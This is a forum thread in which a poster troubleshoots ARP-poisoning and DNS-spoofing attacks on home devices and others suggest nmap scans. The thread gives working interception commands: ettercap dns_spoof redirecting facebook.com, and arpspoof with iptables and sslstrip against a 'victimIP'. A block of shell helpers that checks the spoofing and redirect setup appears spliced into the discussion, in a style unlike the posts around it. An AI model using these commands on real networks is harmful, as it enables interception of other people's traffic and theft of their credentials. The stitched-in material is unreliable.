Hi guys
I'm testing some attacks against the machines of my private network.
I've got 1 XP machine, 1 Seven machine, 1 iPad, 1 MacBook Pro and 1 Android phone.
In the last 2 days I stress-tested these PCs with DNS spoofing (ettercap).
Microsoft OS machines are completely "spoofable" but there's no way to redirect traffic of OSX and Android machines.
Are there any special commands to run to complete an attack against non-Microsoft OS machines??
If you're on a switched LAN you can try with macof
I've been able to spoof Mac OSX on one occasion, and sniff.. Also with Android cell phones...
Have you tried running nmap against these 2 devices to see what is at their ports?.. Need to see what is going on in those devices... Make a deep scan:
Code:
nmap -sC -sS -sV -PN -p- -T4 -O --osscan-guess xxx.xxx.xxx.xxx,xxx
(Put here the IPs of the Mac OSX and the Android: 192.168.1.120,121) or one by one.
...It will take some time since it will scan not only the first 1024 ports and some high ports (nmap default), but all 65535 ports.
Then analyze the info. There must be something listening on ports, some application or something avoiding the ARP poisoning.
Also use arp -a and Wireshark to analyze ports and the ARP protocol.
@prelite
Quote:
Microsoft OS Machines are completely "spoofable" but there's no way to redirect traffic of OSX and android machines.
Please be more specific. What did you try? What happened when you tried? etc.
@all / @maverik35
Just to simplify: if you're going to do script scanning (-sC), version detection (-sV), and OS fingerprinting (-O) you may as well just use the -A switch and shorten things up:
Code:
nmap -sS -PN -p- -T4 -A --osscan-guess xxx.xxx.xxx.xxx,xxx
Further, since it's the OP's own network there's no reason to be at all polite in the timing: may as well use -T5, and chances are you don't need to resolve host names, so save yourself some time by adding -n for no DNS resolution.
Lastly while I believe -PN still works and will continue to for a number of future versions, you may want to start using -Pn as they're trying to be consistent across options and how things are enabled/disabled. (You can see from nmap --help this has been changed recently.)
Last edited by thorin; 07-16-2012 at 08:34 AM.
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
First of all I wanna thank you all for your answers.
Please excuse me if I write back late, but last week I was on holiday.
Quote:
Please be more specific. What did you try? What happened when you tried? etc.
Here is what I actually try:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
locate etter.dns
nano /usr/share/ettercap/etter.dns
# for example I put the following line in the file etter.dns:
*.facebook.com A XXX.XXX.XXX.XXX
ettercap -T -q -i wlan0 -P dns_spoof -M arp // //
or this:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000   # also tried with port 8080 or 443
sslstrip -l 10000
arpspoof -i wlan0 -t victimIP routerIP
With arpspoof, sslstrip doesn't write anything in the log file, and with ettercap the victim OSX/Android PC/smartphone doesn't redirect the request for facebook.com to XXX.XXX.XXX.XXX.
This instead is the result of the command "nmap -sC -sS -sV -PN -p- -T4 -O --osscan-guess xxx.xxx.xxx.xxx" launched against the IP of the OSX machine.
Code:
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-07-08 22:09 CEST
Warning: 192.168.XXX.XXX giving up on port because retransmission cap hit (6).
Nmap scan report for 192.168.XXX.XXX
Host is up (0.0030s latency).
All 65535 scanned ports on 192.168.XXX.XXX are closed (65484) or filtered (51)
MAC Address: F0:B4:79:XX:YY:ZZ (Apple)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 717.49 seconds
I'm all ears guys.
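Two offline sanity checks for the two setups in the post above, written as an added example for this thread; they are not the poster's commands and not part of ettercap or sslstrip. The first, etter_lookup, resolves a name against an etter.dns-style entry list so you can see which names an entry really matches before starting ettercap; it assumes ettercap's wildcard is glob-style (`*` stands for any run of characters), which is also why ettercap's shipped etter.dns lists the bare domain and the `*.domain` entry separately. The second, redirect_port, pulls the target port out of `iptables -t nat -S` output and compares it with the port sslstrip was started with. The etter.dns contents, the 192.0.2.x addresses and the iptables listing are constructed for the example; the function names are my own.

```shell
#!/bin/sh
# Added example: offline checks for the dns_spoof and sslstrip setups discussed above.

# Constructed sample etter.dns (192.0.2.0/24 is documentation address space).
ETTER_SAMPLE='# constructed sample, not a real configuration
facebook.com       A   192.0.2.10
*.facebook.com     A   192.0.2.10
www.example.net    A   192.0.2.20
'
ETTER_FILE=$(mktemp)
printf '%s' "$ETTER_SAMPLE" > "$ETTER_FILE"

# etter_lookup NAME FILE: print the A target the first matching entry gives NAME,
# exit 1 if no entry matches. Fields are: name  type  target.
etter_lookup() {
    name=$1
    file=$2
    while read -r pat type target rest; do
        case "$pat" in ''|'#'*) continue ;; esac   # skip blank lines and comments
        [ "$type" = "A" ] || continue
        # An unquoted pattern in case does glob matching (assumed to mirror ettercap):
        # '*.facebook.com' matches 'www.facebook.com' but NOT the bare 'facebook.com'.
        case "$name" in
            $pat) printf '%s\n' "$target"; return 0 ;;
        esac
    done < "$file"
    return 1
}

# Constructed `iptables -t nat -S` listing for the PREROUTING rule posted in the thread.
NAT_RULES='-P PREROUTING ACCEPT
-P INPUT ACCEPT
-P OUTPUT ACCEPT
-P POSTROUTING ACCEPT
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 10000'

# redirect_port RULES: print the --to-ports value of the PREROUTING tcp/80 REDIRECT rule.
redirect_port() {
    printf '%s\n' "$1" | awk '
        /^-A PREROUTING/ && /--dport 80 / && /-j REDIRECT/ {
            for (i = 1; i <= NF; i++) if ($i == "--to-ports") { print $(i+1); exit }
        }'
}

# redirect_matches_listener RULES LISTEN_PORT: succeed only if port 80 traffic is sent
# to the port sslstrip listens on (-l LISTEN_PORT; sslstrip's default is 10000).
redirect_matches_listener() {
    [ "$(redirect_port "$1")" = "${2:-10000}" ]
}
```

Point etter_lookup at the real /usr/share/ettercap/etter.dns with the exact name the client asks for (www.facebook.com rather than facebook.com, for instance), and feed redirect_port the live output of `iptables -t nat -S` whenever you change --to-port: sslstrip only ever sees what lands on the port it was started with, so the rule and the -l value have to agree.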
Quote:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 --> Also tried with port 8080 or 443
sslstrip -l 10000
arpspoof -i wlan0 -t victimIP routerIP
Someone correct me if I'm wrong ... I've never futzed with sslstrip, but looking at this it seems like you're trying to take traffic which was destined for port 80 (regular HTTP, not HTTPS) and send it to sslstrip ... what good is that?
Quote:
Someone correct me if I'm wrong ... I've never futzed with sslstrip but looking at this it seems like you're trying to take traffic which was destined for port 80 (regular HTTP not HTTPS) and send it to sslstrip ...
That's right, I'm trying to catch that kind of traffic, but with the Microsoft PC it works and with the OSX or Android machines it doesn't... why?
Last edited by prelite; 07-13-2012 at 08:21 AM.
I do not agree with you in your statements. Why? When I first got to know about nmap, I watched a metasploit video (4 videos); one of them was explained by the guy who wrote the SET.. In the video he uses the same as I did above.. And I saw the Fyodor video using the -A option, which indeed included some options. Why does the other guy use all the parameters instead of doing it like Fyodor?... If that will make my nmap output have wrong info, I'd better use the -A option...
Why use sslstrip -l 10000?.. It is the default, you do not need to do so.. But does it hurt?.. Redundant?... Does it work?... Yes, all of the above, as long as you know it is redundant, that it does not affect your output...
What if I want to use DNS?.. It is important to me, perhaps not to you... It depends on the people's own choice.
If I want to be polite in timing?.. Does it hurt?... If so, then let's get rid of -T1 to -T4 and let's just use -T5... For some reason all the parameters are available.. Because we all can use them as we think works best for us.
I use -sC because if there is a PC using ssh, you can see some important info... I do not have to use some script if not needed, I'm not obligated to use them just because I use -sC... As long as you know you can use scripts...
Yours is the best way?...
Not to me...Sure it is another way, yes..But best?...Not to me...
You're right, things never change or evolve in IT, why should you adapt or learn?
Quote:
Why use sslstrip -l 10000?..It is a default, you do not need to do so..But does it hurts?..Redundant?...Does it work?...Yes, all of the above, as long as you know it is redundant, that it does not affect your output...
Did someone ask about that part? I must have missed it.
Quote:
What if I want to use DNS?..It is important to me, perhaps not to you...It depends on the people's own choice.
Go for it, I never said you can't or shouldn't.... I said "Further since it's the OP's own network ... chances are you don't need to resolve host names so save yourself some time by adding -n for no DNS resolution."
Quote:
If I want to be polite in timming?..Does it hurts?...If so, then let's get rid of -T1 to 4 and lets just use T5...For some reason there are all parameters available.. Because we all can use them as we think it can work best for us.
Again, I didn't say NOT to use it as you suggested, I said "Further since it's the OP's own network there's no reason to be at all polite in the timing: may as well use -T5".
Quote:
I use -sC because if there is a pC using ssh, you can see some important info...I do not have to use some script if not needed, I'm not obligated to use them just because I use -sC...As long as you know you can use scripts...
AGAIN, I never said you couldn't use -sC, I was simply pointing out that you can simplify things as -A is the same as doing -O -sC -sV.
Quote:
Yours is the best way?...
I never claimed it was, I was simply trying to streamline things for people and increase people's pool of knowledge. But again, take the advice or don't, it doesn't affect me in any way.
Quote:
Not to me...Sure it is another way, yes..But best?...Not to me...
Wow, you just keep going and going, eh? Do it however you like. Some people like to increase their knowledge pool and learn new or different ways to do things, others just do things the same way all the time. I guess you do it the same way you saw it in some tutorial along the way; hopefully nothing will ever change, and it'll never fail to work how you originally learned it.
BTW the word "best" doesn't appear in this thread until your post....
Last edited by thorin; 07-16-2012 at 08:34 AM.